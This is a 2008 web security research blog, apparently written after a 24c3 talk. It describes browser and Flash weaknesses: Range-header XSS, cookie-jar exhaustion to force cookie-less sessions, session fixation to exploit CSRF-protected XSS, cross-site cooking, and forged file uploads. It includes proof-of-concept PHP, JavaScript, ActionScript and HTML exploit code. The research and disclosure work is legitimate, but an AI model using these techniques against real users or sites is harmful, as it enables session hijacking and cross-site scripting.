Saturday, February 23, 2008

HTTP Range & Request-Range Request Headers

For those that haven't heard of the Range header, here's a link: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.2

For everyone who can't be bothered reading a link; essentially the Range header is what you use to ask a server for a part of a response, rather than the whole response; it's what makes resumeable downloads possible over http.

Anyway, another piece of research I presented at 24c3 is pretty simply, but rather useful:

Flash



If Flash were to allow us to send a Range header, then we would be able to get things sent to us completely out of context.

Until Apache 2.0 this header was only used when requesting static files, so it would not influence a typical XSS, however if we have an application such as vBulletin which protects against FindMimeFromData XSS attacks by searching the first 256 bytes for certain strings, then we can simply place our strings after the first 256 bytes and get Flash to send a header which looks like this:
Range: bytes=257-2048
To have unscanned data sent in the first 256 bytes, leading to XSS.

However since Apache 2.0 (and possibly in other webservers, but they're irrelevant to this post), the Range handling code is implemented as a filter; this means that it is applied to the output of every request, even if they are dynamic requests.

This means that if we were to have a normally unexploitable XSS condition where our use input was printed to the page inside an attribute with quotes either encoded or stripped, but all other metacharacters left intact, or an xss filter did not encode the html attributes you had at all like so:
<a href=“http://site.com/<script>alert(1)</script>”>link</a>

Then we could use the Range header to request only our unencoded portion which would result in XSS.

Now, why is this important since Flash has never let anyone send a Range header?

Well, while looking through the Apache source code I found this beautiful snippet:
if (!(range = apr_table_get(r->headers_in, "Range"))) {
range = apr_table_get(r->headers_in, "Request-Range");
}


Which essentially says that if you can't find a Range header, look for a Request-Range header, and untill the latest version of Flash (9,0,115,0), the Request-Range header was not blocked. (I had hoped this would be unpatched when I presented it, but you can't really hope for much when you sit on a bug for almost half a year...)

Firefox


Now the part I didn't present. In Firefox 3 Firefox implemented the new Cross-Site XMLHttpRequest which, as the name suggests, lets you make cross-site requests and read the responses.

There is some documentation here: http://developer.mozilla.org/en/docs/Cross-Site_XMLHttpRequest

The part of those specs which is relevant to this post is that you can allow Cross-Site XMLHttpRequests by including an XML preprocessing instruction; however you can't just XSS it onto the page as usual because it needs to be before any other data.

However, the XMLHttpRequest object allows you to append both Range and Request-Range headers. And by appending a Range header we can get our XSS-ed instruction to the start of the response, and read the response.

The limitations with this are fairly strict; as far as I can tell, you cannot add to the XHR policy cache with xml instructions, only with headers, and if you attempt to request multiple ranges, then the multi-part boundary which begins the response will be sent before the xml instruction, and so it will not be parsed, so you can only get the contents of the page that are after your XSS point. On the other hand I wasn't even able to get non-GET requests to work with server-side co-operation, so take these with a handful of salt.

On the up side, this does bypass the .NET RequestValidation mechanism since that does not flag on <? However, I doubt this will be very exploitable in many scenarios, though given the amount of .NET apps which are only protected by the RequestValidation mechanism; you're sure to find something.

Friday, February 22, 2008

Racing to downgrade users to cookie-less authentication

Be warned: this post is a bit out there, and not extremely practical, but I'm posting exploit code and I thought the attack was fun.

If you ever disable cookies and try to use the web you will notice that a surprising number of websites that use sessions still work, especially if they are using a session management framework or were written during the browser wars when a significant number of people still didn't have cookie support in their browser, or were suspicious enough to have them disabled.

All of the cookie-less authentication systems rely on the same idea: passing session tokens through the URL. Other than being bad practice because it gets logged, etc, FUD, etc, they also get leaked through referers to 3rd parties. So if we can get an persistent image pointing to our server, then we will have the session tokens leaked to us. And it does have to be persistent, because unlike cookies, session tokens passed in the URL are not implicit and are not attached to our reflected html injections.

However this is usually never raised as an issue because everyone has cookies enabled these days, and this attack doesn't work against anyone.

However, how do web applications which need to work without JavaScript detect if a user's browsers supports cookies? They simply set a cookie, and then when the user logs in they verify whether a cookie was sent, and if it was not they then start putting the session id in all the links and forms on a page. Some applications also check on every subsequent page if they can set a cookie, and if they can there is no way to degrade to cookie-less auth again.

As I wrote previously; I discovered that in Firefox and Opera we can exhaust the cookie limit to delete the user's old cookies.

If we assume that we will have the user browsing both a site which degrades to cookie-less auth and our malicious site at the same time then if you think about this then you can see that there is a race condition between when the server sets the cookie and the user logs in (and in some applications between when a page is served and the next html request is made).

The question is; can we win this race?

In Firefox, it takes approximately 100 miliseconds on my machine to set 1000 cookies over 20 hostnames, with 1 hostname per iframe. So we can win any race.

In my testing Opera is much faster at navigating between pages and setting cookies, however I'm still unsure if we can win this race in Opera.

I think the code at the end of this post can be improved by having the iframes on hostnames which looks like a.b.c.d....z.123.ccTLD and are 256 characters long and is made up of 126 levels of hostnames, where the first 125 levels are single character portions, so as to maximise the number of levels on the hostname.

And then in each iframe we would set the max number of cookies for .a.b.c.d....z.123.ccTLD then .b.c.d....z.123.ccTLD and then .c.d....z.123.ccTLD etc, until we set a cookie for 123.ccTLD - this would mean we do not havew to navigate between pages at all, and we could do opera's 65536 max cookie limit in 18 iframes; however before doing this we might have to force a lookup to all 2815 hostnames so that we don't hit a bottleneck in Opera's cross-site cooking code.

However, if we cannot get things as fast as in Firefox, we may still be able to win some races.

A lot depends on the application, but the easiest case is where we only have to win one race, and we can keep racing, such as the Phorum software which runs sla.ckers.org; it sets a temporary cookie which it checks the existence of when you login, and if it is not there when you login, it uses cookie-less auth for the whole session.

So our race here is against how long it takes the user to fill in the login page; and considering that if we lose the race we end up deleting all the cookies, we simply race again and again.

vBulletin on the other hand, is a much tougher beast. It tries to set a cookie on every page, even when you have begun using cookie-less auth, and also has a redirect page which redirects you in 2 seconds.

So not only do we have to win every race until a user views our image, we also have to be able to beat a two second race.

We can probably stop the redirect happening by simply running our code (which lags the system a bit), and winning the race like that, but winning the race 100% of the time may still be difficult, and would lag the system enough for the user to think of closing the tab/window.

However, when we race we race against everything, so the code we use is identical between applications, and would only have to change between browsers.

Anyway, here's some code for Firefox which spins when it doesn't need to be racing, i.e. when it has completely saturated the cookie jar and writing any additional cookie would simply overwrite earlier cookies that our script set, so that it only lags the system in bursts.

You need to have 20 subdomains setup which point to the second file; the easiest way to do this is just wildcard DNS. And have the first file setup on the parent domain, e.g. [1-20].localhost & localhost

main.php:
<html>
<body>
<script>
document.domain = document.domain;

var numloaded = 0;
var tries = 0;

function loaded() {
if (++numloaded == 20) {
go();
}
}

var numnotified = 0;

function notify() {
if (++numnotified == 20) {
numnotified = 0;
window.setTimeout ('poll()', 300);
}
}

var time = new Date();

function go() {
numnotified = 0;
document.cookie = 'testing=1';
for (var n=0;n<20;n++) {
window.frames[n].go();
}
}

function poll() {
var missing = 0;
for (var n=0;n<20;n++) {
missing = missing + window.frames[n].poll();
}
if (missing>0) {
go();
} else {
window.setTimeout ('poll()', 300);
}
}

</script>
<?php
for ($i=0;$i<20;$i++) {
print '<iframe src="http://'.($i+1).'.localhost/cookie_sub.php" style="visibility: hidden" width="1" height="1"></iframe>';
}
?>
</body>
</html>


cookie_sub.php:
<?php
header ("Expires: Fri, 17 Dec 2010 10:00:00 GMT"); //To speed up repeated attacks
?>
<html>
<body>
<script>

document.domain = 'localhost';
window.parent.loaded();

function go() {

for (var n=0;n<50;n++) {
document.cookie = n+"=1";
}


window.parent.notify();
}

function poll () {
if (document.cookie.split('; ').length==50) {
return 0;
} else {
return 1;
}
}

</script>
</body>
</html>

Exploiting CSRF Protected XSS

XSS vulnerabilities which are protected by CSRF protections, are usually considered unexploitable due to the fact that we have no way of predicting the CSRF token.

However, these protections do nothing more than check that the user is first "logged in" and that the CSRF token they sent is tied to their session; nowhere in this chain of events is there a condition which states that an attacker must be forcing the victim to use their own session identifier (cookie).

If we are able to force the victim to send a request which contains the attacker's cookie, CSRF token and XSS payload, then we will pass the CSRF protection checks and have script execution.

A General Case



So how would we go about this? As I mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post, Flash (until 9,0,115,0 and not in IE) allows us to spoof the Cookie header for a single request, however this suffers from the same problem that we cannot completely over-write cookies; only add an additional Cookie header.

This is indeed a possible attack vector though; if we first make sure the user is "logged out" (and also has no value for the login cookie) either by simply waiting, using a CSRF attack to log the user out (and hoping the website also clears it's cookies), or exhausting the browser's cookie limit, we can then add our own Cookie, CSRF token and XSS payload to the request using similar Flash code e.g.

class Attack {
static function main(mc) {
var req:LoadVars = new LoadVars();
req.addRequestHeader("Cookie", "PHPSESSID=our_valid_session_id");
req.x = "y";
req.send("http://site.com/page.php?csrf_token=our_csrf_token&variable=",
"_self", "POST");
// Note: The method must be POST, and must contain
// POST data, otherwise headers don't get attached
}
}


Then the application will receive a request with our (the attacker's) session id, a valid CSRF token and our XSS payload from the victim's browser.

Of course, the problem with this is that if the user is actually logged out (which we forced, due to our inability to simply over-write the cookie or stop it being sent) and the browser no longer has the victim's cookies, the only attacks we have from this point are the other attacks mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post. And while this is not ideal, it does at least give us something other than an unexploitable XSS.

Cookie tricks


Again, with this technique we can also set a cookie for the specific path, either by having an XSS on a related subdomain or by abusing a cros-site cooking bug, and then the user will still have their original cookie intact and we can simply remove our own cookie from the user's browser once our XSS has fired.

Abusing RequestRodeo


Another case where the user would be logged out is the case where we can somehow get the cookies stripped from the user's request.

The technique I presented at 24c3 talked about abusing one such piece of software which stripped cookies; the RequestRodeo Firefox extension which was created by Martin Johns and Justus Winter which does a good job of protecting against a lot of CSRF attacks by stripping cookies from requests originating from 3rd party sites (i.e. a request going to site.com which was induced by evil.com will not have any cookies attached to it). Which is just what we need.

Of course, this is a nice place to note that this is of course a niche piece of software that doesn't really provide a valid avenue for exploitation in almost any scenario, but as I explained in my post "Understanding Cookie Security" we can also delete all a users' cookies by exhausting the browser's global limit on on the amount of cookies it will store.

Anyway, given that RequestRodeo all cookies (including the ones we are attempting to send via Flash), we still face the problem that we need to be sending a valid session identifier for which we need to be sending a valid CSRF token. We do not face this problem when we remove the user's cookies, and can use the Flash approach outlined above, but we can also use this approach, which has the added benifit of still working on everyone (not just those who are unpatched).

Anyway, one interesting feature of PHP and other frameworks is that they accept session identifiers through the URL. This has of course led to easily exploitable Session Fixation attacks; however in PHP at least, if a cookie is being sent, then the value in the URL is completely ignored.

In our case, no cookie is being sent, since it is either being stripped by RequestRodeo, or has been deleted by us, so we can simply supply our session identifier through the URL, attach our CSRF token and XSS payload and we're done, except in this case the browser still has the user's cookies, and our XSS functions like normal.

The result of this attack is the same as the above if we have deleted the cookies from the user's browser, however if we have stripped the cookies with RequestRodeo or some similar tool/technique/etc, then we have the further benifit of the user still being logged in when our XSS fires.

Other Cookie Tricks


As I wrote in my post "Understanding Cookie Security", if we have an XSS which is largely unexploitable (except via pure Session Fixation) since it is on a subdomain with no accounts, we can use it to set almost arbitrary cookies for other subdomains.

This gives us a perfect avenue, since we can set the path to only over-write cookies for our single CSRF Protected XSS page, and send the appropriate CSRF token and XSS payload for.

Self-Only CSRF Protected Persistent XSS


One case which is much simpler to exploit than the general case though, is where there are CSRF protections on the form where you submit the actual XSS, but the XSS is a persistent XSS for the user, in that it is rendered on another page (which is itself not CSRF protected, since it is used to display rather than edit data)

CAPTCHAs As CSRF Protections


CAPTCHAs are not designed to be CSRF protections, and in certain cases are bypassable.

There are essentially two (not completely broken) types of CAPTCHA systems I have seen in widespread use, one where the plaintext is simply stored in the server-side session and the captcha is included in a form like this:
<img src="captcha.php" />
The other is when a form has a hidden input tag which contains a value which is also inside the image URL, like so:
<input type="hidden" name="captcha_id" value="1234567890" />
<img src="captcha.php?id=1234567890" />


The first system is trivially bypassed for CSRF & CSRF Protected XSS attacks by simply inserting the CAPTCHA onto a page, or inside an iframe (to strip/spoof referers), and asking the user to solve it.

The second can often be trivially bypassed for CSRF & CSRF Protected XSS attacks since the id is usually not user-dependant and the CAPTCHA does not keep track of what id it sent the user. Therefore the attacker can simply retrieve the appropriate CAPTCHA, solve it, and put the answer along with the corresponding captcha id in the csrf or csrf protected xss attack.

Conclusion


So essentially if we can somehow trick the application into using an attacker's session identifier, either by altering the cookie (e.g. via subdomain tricks, Flash, injecting into Set-Cookie headers, or whatever other trick we can come up with), or by suppressing or deleting the cookie and passing the identifier through another means such as the URL, then all CSRF protected XSSs are exploitable.

However if we cannot, then we can still exploit some scenarios such as self-only CSRF protected persistent XSS if the logout/login functionality is not CSRF-protected (which very few are). And we can also bypass the semi-CSRF protection of CAPTCHAs in several cases.

Exploiting Logged Out XSS Vulnerabilities

Usually when we consider vulnerabilities which are only rendered when a user is logged out (e.g. a side bar which renders a vulnerable login form when logged out, and a menu otherwise), the known methods of attack lie in, first getting the user logged out, and then doing one of the following:

  • Extracting login information from the Password Manager

  • Modifying a client-side data store, such as cookies or Flash LSO's to create an attack which fires later when a user is logged in

  • Conducting a Session Fixation attack



Some new possibilities for attacking these vulnerabilities are:


  • Reading the Browser Cache via XSS

  • Semi-Logging the User Out



Reading the Browser Cache via XSS


Most browsers do not let you read pages which have not been explicitly cached, and where the Expires or Cache-Control headers have not been set, except Internet Explorer.

If you use the XmlHttpRequest object to make a request to a resource which has no caching information attached to it you will simply get back the cached copy which may contain sensitive information such as the person's billing details, or other juicy information you an use in other exploits.

But since security people have been parroting on about how websites need to make sure that they don't let the browser cache something because the user may be using a public computer, etc, etc, this is much less viable, however at least we now have a real reason for recommending people to not let the browser cache things.

Semi-Logging the User Out


However before we jump to the conclusion that the vulnerability is only triggered when the user is logged out let us consider what it really means to be "logged in".

To be "logged in" is to send the web application a cookie header which gets parsed by the server/web application framework (e.g. Apache/PHP), and the parsed value is associated by the application with a valid session.

So conversely, when are you "logged out"? You're logged out whenever the above series of events (plus any other steps I missed) don't fall exactly into place.

So if we start with a user who is currently logged in; instead of logging them out completely via CSRF (or just waiting until they log themselves out), the trick here is to create an exploit which fires when the browser still holds the users cookies, but the application doesn't receive those cookies exactly.

The easiest and most generic place (I found) to attack this chain is to alter what the browser sends, and therefore the server receives.

Until the latest version of Flash (which is 9,0,115,0), the following code ran properly and let us tamper with the Cookie header:

class Attack {
static function main(mc) {
var req:LoadVars = new LoadVars();
req.addRequestHeader("Cookie", "PHPSESSID=junk");
req.x = "y";
req.send("http://site.com/page.php?variable=",
"_self", "POST");
// Note: The method must be POST, and must contain
// POST data, otherwise headers don't get attached
}
}


Unfortunately this does not work in IE, since IE seems to stop plugins from playing with the Cookie headers it sends.

Furthermore, this does not actually replace the Cookie header which the browser sends, rather it forces the browser to send an additional Cookie header which would make the relevant part of the HTTP request look something like to this:

Cookie: PHPSESSID=valid_id
Cookie: PHPSESSID=junk


Which PHP (and pretty much every other Server/web application framework) would reconcile into the single PHPSESSID value of:

valid_id, PHPSESSID=junk

Which is of course not a valid session token, and the application treats the user as logged out, and our XSS executes as if the user was logged out, however since the browser still has all the cookies, so we can either steal them or get the user to perform actions on our behalf, etc.

The less generic, but still working approach is to overwrite overwrite the cookies for your particular path only, either via an XSS from a related subdomain or by abusing a cross-site cookie bug in a browser (check my last post).

Understanding Cookie Security

Whenever anyone decides to talk about XSS, one thing which is sure to pop up is the Same Origin Policy which XSS avoids by being reflected by the server. The Same Origin Policy is the security restriction which make sure that any pages trying to communicate via JavaScript are on the same protocol, domain and port. However this is misleading since it is not the weakest link that browsers have between domains.

The weakest link across domains is (for lack of a better term) the cookie policy which determines which domains can set cookies for which domains and which cookies each domain receives.

What's in a cookie


The cookies we use have several fields, including these ones I want to talk about:

  • Name

  • Value

  • Domain

  • Path

  • Expires



First, it must be noticed that the protocol restriction which is explicit in the Same Origin policy is here implicit, since cookies are an extension to HTTP, and so would only be sent for http, however the distinction between http and https is only enforced if the Secure flag is set.

Secondly, unlike the same origin policy, the cookie policy has no restrictions on ports, explicit or implicit.

And furthermore the domain check is not exact. From RFC 2109:
   Hosts names can be specified either as an IP address or a FQHN
string. Sometimes we compare one host name with another. Host A's
name domain-matches host B's if

* both host names are IP addresses and their host name strings match
exactly; or

* both host names are FQDN strings and their host name strings match
exactly; or

* A is a FQDN string and has the form NB, where N is a non-empty name
string, B has the form .B', and B' is a FQDN string. (So, x.y.com
domain-matches .y.com but not y.com.)

Note that domain-match is not a commutative operation: a.b.c.com
domain-matches .c.com, but not the reverse.


Effectively, this means that that any subdomains of a given domain can set, and is sent the cookies for that domain, i.e. news.google.com can set, and is sent the cookies for .google.com. Furthermore a second subdomain, e.g. mail.google.com can also set, and is sent the cookies for .google.com - This effectively means that by setting a cookie for google.com, news.google.com can force the user's browser to send a cookie to mail.google.com.

Resolving Conflicts


But what if two cookies of the same name should be sent to a given page, e.g. if there is a cookie called "user" set for mail.google.com and .google.com with different values, how does the browser decide which one to send?

RFC 2109 states that the cookie with the more specific path attribute must be sent first, however it does not define how to deal with two cookies which have the same path (e.g. /) but different domains. If such a conflict occurs then most (all?) browsers simply send the older cookie first.

This means that if we want to overwrite a cookie on mail.google.com from the subdomain news.google.com, and the cookie already exists, then we cannot over-write a cookie with the path value of / (or whatever the path value of the existing cookie is), but we can override it for every other path (up to the maximum number of cookies allowed per host; 50 in IE/Firefox 30 in Opera), i.e. if we pick 50 (or 30 if we want to target opera) paths on mail.google.com which encompass the directories and pages we want to overwrite the cookie for, we can simply set 50 /30 separate cookies which are all more specific than the existing cookie.

Technically the spec say that a.b.c.d cannot set a cookie for a.b.c.d or b.c.d only, none of the browsers enforce this since it breaks sites. Also, sites should not be able to set a cookie with a path attribute which would not apply to the current page, but since path boundaries are non-existant in browsers, no-one enforces this restriction either.

Cross-Site Cooking


When you think about the problem in the above scenario, you end up asking; can I use the same technique to send a cookie from news.com to mail.com? Or some similar scenario where you are going from one privately owned domain to another in a public registry. The RFC spec did foresee this to some degree and came up with the "one dot rule", i.e. that you can't set a cookie for a domain which does not have an embedded dot, e.g. you cannot set a cookie for .com or .net, etc.

What the spec did not foresee is the creation of public registries such as co.uk which do contain an embedded dot. And this is where the fun begins, since there is no easy solution for this, and the RFC has no standard solution, all the browsers pretty much did their own thing.

IE has the least interesting and most restrictive system; you cannot set a cookie for a two letter domain of the form ab.xy or (com|net|org|gov|edu).xy. Supposedly there is a key in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\SpecialDomains which will let you whitelist a domain to allow ab.xy to be set and my registry has the value "lp. rg." for that key, but I haven't been able to set a cookie for ab.pl or ab.rg so go figure.

Opera on the other hand has perhaps the most interesting system of all the browser vendors. Opera does a DNS lookup on the domain you are trying to set a cookie for, and if it finds an A record (i.e. the domain has an IP address associated with it) then you can set a cookie for it. So if ab.xy resolves to an IP then you can set a cookie for it, however this breaks if the TLD resolves, as is the case for co.tv

Firefox 2 seems to have no protections. I was unable to find any protections in the source and was able to get foobar.co.uk to set cookies for .co.uk, so ummm, why does no-one ever mention this? I have no clue....

Firefox 3 on the other hand has a huge list of all the domains for which you cannot set cookies, which you can view online here. Hurray for blacklists.....

Exhausting Cookie Limits


Another interesting aspect of cookies is that there is a limit on how many cookies can be stored, not only per host, but in total, at least in Firefox and Opera. IE doesn't seem to have such a restriction.

In Firefox the global limit is 1000 cookies with 50 per host (1.evil.com and 2.evil.com are different hosts), and on Opera it is 65536 cookies with 30 per host. IE does not seem to have a global limit but does have a host limit of 50 cookies. When you reach the global limit, both browsers go with the RFC recommendation and start deleting cookies.

Both Firefox and Opera simply choose to delete the oldest cookies, and so by setting either 1000 or 65536 cookies depending on the browser, you effectively clear the user's cookie of anything another domain has set.

Conclusion


By either setting the path attribute to point to more specific pages we can effectively overwrite cookies from other domains that we can set cookies for, which includes all the co.xy domains. Also, if we are attacking Firefox or Opera we can simply delete the existing cookies if we need to force our cookie to be sent to a path for which a cookie is already set (e.g. /).

You may also be able to induce some weird states, if you somehow manage to only delete one cookie where an applicaiton expects two, or similar, but I doubt that would be very exploitable.

CSRF-ing File Upload Fields

It seems I'm destined to have everything I sit on for a while patched or found and disclosed by someone else, *sigh*, I guess that's the way things go though.

Oh well, pdp has an interesting post over at gnucitizen.org about how to perform CSRF attacks against File upload fields using Flash: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/

Since there would be no point publishing this later, here is the method I came up with a while ago to CSRF File upload fields

<form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data">
<textarea name='file"; filename="filename.ext
Content-Type: text/plain; '>Arbitrary File
Contents</textarea>
<input type="submit" value='Send "File"' />
</form>


It relies on a bug in Firefox/IE/Safari where the filenames are not escaped before being put into the POST body to set the filename parameter and content-type header.

Note: http://kuza55.awardspace.com/files.php is probably vulnerable to a tonne of things; I'm not too worried as it's on free hosting.